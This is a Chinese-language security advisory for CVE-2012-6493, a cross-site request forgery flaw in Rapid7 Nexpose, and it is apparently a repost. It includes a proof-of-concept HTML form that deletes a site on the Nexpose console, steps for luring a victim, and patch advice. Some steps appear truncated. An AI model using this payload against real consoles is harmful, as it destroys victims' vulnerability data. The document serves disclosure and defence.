Rapid7 Nexpose多个跨站请求伪造漏洞

发布日期:2013-01-03
更新日期:2013-01-07

受影响系统:
Rapid7 Nexpose < 5.5.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57150
 CVE(CAN) ID: CVE-2012-6493
 
Nexpose是一款漏洞管理软件。
 
Nexpose 5.5.4之前版本没有正确检查各个URL的refer域,远程攻击者若通过某种方式获得了合法用户的cookie,那么便可以以合法用户的身份执行删除扫描数据和站点等操作。
 
<*来源:Robert Gilbert
 
  链接:
        https://community.rapid7.com/docs/DOC-2065#release5
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Exploit steps for proof-of-concept:
 1. Create an external site/page: that contains:
 [code]
 <html>
  <!-- Nexpose CSRF PoC -->
  <body>
 <form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1"; method="POST" enctype="multipart/form-data">
      <input type="submit" value="delete site" />
    </form>
    <script>
      //document.forms[0].submit(); //uncomment to auto-submit
    </script>
  </body>
 </html>
 [/code]
 2.      Lure victim to
 3.      Site with ID 1 is deleted when form is submitted.

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Rapid7
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygwys.html